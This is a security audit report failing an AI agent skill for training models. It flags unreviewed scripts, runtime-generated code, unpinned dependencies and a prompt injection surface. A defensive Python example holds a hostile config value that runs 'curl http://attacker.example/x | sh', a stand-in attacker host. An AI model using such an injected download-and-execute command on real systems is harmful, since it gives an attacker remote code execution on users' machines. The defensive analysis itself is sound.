training-patterns
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH (COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION, PROMPT_INJECTION)
Full Analysis
- COMMAND_EXECUTION (HIGH): The skill README instructs the user to run shell scripts (e.g., ./scripts/setup-peft.sh) that are described as functional but are missing from the skill package, so their contents cannot be reviewed before execution. Running unverified shell scripts is a high-risk operation that could compromise the host system.
- REMOTE_CODE_EXECUTION (HIGH): The skill's primary functionality involves dynamically generating Python scripts (train.py, predict.py) and then executing them. This pattern is a significant security risk because it can obfuscate malicious behavior and bypass static analysis by materializing executable logic only at runtime.
- EXTERNAL_DOWNLOADS (MEDIUM): The example workflows require installing dependencies via pip install -r requirements.txt. Without a provided requirements file, or pinned versions for packages like transformers and peft, this introduces a supply-chain risk: a malicious or compromised third-party package can be pulled in at install time.
- PROMPT_INJECTION (MEDIUM): Per Category 8, the skill exhibits a clear indirect prompt injection surface by ingesting external datasets and user-defined parameters. Ingestion points: classification-config.yaml and generation-config.yaml (CSV/JSON datasets). Boundary markers: absent. Capabilities: command execution and file system modification. Sanitization: none detected. If user-controlled data or configuration strings are interpolated into the generated scripts or shell commands without strict sanitization, the result is arbitrary command injection.
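The following is an added example, not code from the audited skill or from the Trust Hub. It illustrates two of the findings above: how a value from a config such as classification-config.yaml, if interpolated into a generated shell command, becomes command injection (and the argv-plus-allowlist form that prevents it), and a check that flags unpinned entries in a requirements file. The config values, the model and dataset names, the requirements content and the placeholder hash are all constructed for the example; the function names are hypothetical.

```python
"""Added example (not part of the audited skill): config-to-command injection
and its hardened form, plus an unpinned-requirements check."""
import re
import subprocess

# Constructed config values in the shape the audit describes for
# classification-config.yaml. HOSTILE_CONFIG carries a payload an attacker
# could place in a user-supplied config or dataset manifest.
BENIGN_CONFIG = {"model_name": "bert-base-uncased", "dataset": "data/train.csv"}
HOSTILE_CONFIG = {
    "model_name": "bert-base-uncased; curl http://attacker.example/x | sh",
    "dataset": "data/train.csv",
}


def render_command_unsafe(cfg):
    """Vulnerable pattern: config strings interpolated into one shell line.
    If this string is passed to subprocess.run(..., shell=True), /bin/sh
    interprets the ';' and '|' in the hostile model_name as new commands."""
    return f"python train.py --model {cfg['model_name']} --data {cfg['dataset']}"


# Allowlist for values that end up on a command line: alphanumerics plus a
# small set of punctuation that model ids and relative paths need. Shell
# metacharacters (space, ';', '|', '$', '`', quotes) are excluded outright.
_SAFE_TOKEN = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._/-]{0,127}$")


def validate_config(cfg):
    """Reject any config value outside the allowlist or containing a '..'
    path segment (traversal). Returns the config unchanged when it passes."""
    for key in ("model_name", "dataset"):
        value = cfg[key]
        if not _SAFE_TOKEN.match(value) or ".." in value.split("/"):
            raise ValueError(f"rejected {key}={value!r}")
    return cfg


def build_argv_safe(cfg):
    """Hardened form: validated values become separate argv elements, never a
    shell string. Intended to be run as subprocess.run(argv) with shell=False."""
    cfg = validate_config(cfg)
    return ["python", "train.py", "--model", cfg["model_name"], "--data", cfg["dataset"]]


def run_training(cfg):
    """Execute the generated command without a shell (not invoked below,
    because train.py does not exist in this example)."""
    return subprocess.run(build_argv_safe(cfg), check=True)


def rejects(cfg):
    """True if the hardened path refuses this config."""
    try:
        build_argv_safe(cfg)
    except ValueError:
        return False if False else True
    return False


# Constructed requirements file; the hash is a placeholder, not a real digest.
SAMPLE_REQUIREMENTS = """\
# constructed requirements file for the example
transformers
peft>=0.4
torch==2.2.0 --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000
"""

_PINNED = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*==\S+")


def unpinned_requirements(text):
    """Return requirement lines that lack an exact '==' pin or a --hash,
    i.e. lines where `pip install -r` would resolve an arbitrary version."""
    problems = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):  # blank, comment, or pip option
            continue
        if not _PINNED.match(line) or "--hash=" not in line:
            problems.append(line)
    return problems


if __name__ == "__main__":
    print("unsafe:", render_command_unsafe(HOSTILE_CONFIG))
    print("safe argv:", build_argv_safe(BENIGN_CONFIG))
    print("hostile rejected:", rejects(HOSTILE_CONFIG))
    print("unpinned:", unpinned_requirements(SAMPLE_REQUIREMENTS))
```

The allowlist is deliberately narrow; widening it to admit spaces or shell metacharacters reintroduces the injection even with an argv list, because the generated train.py may itself pass values on to another shell. Pinning with `==` and `--hash=` means `pip install -r requirements.txt` only installs artifacts whose digest matches, which is the check the EXTERNAL_DOWNLOADS finding calls for.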
Recommendations
- Automated analysis detected serious security threats; the skill fails review (see Full Analysis above).
Audit Metadata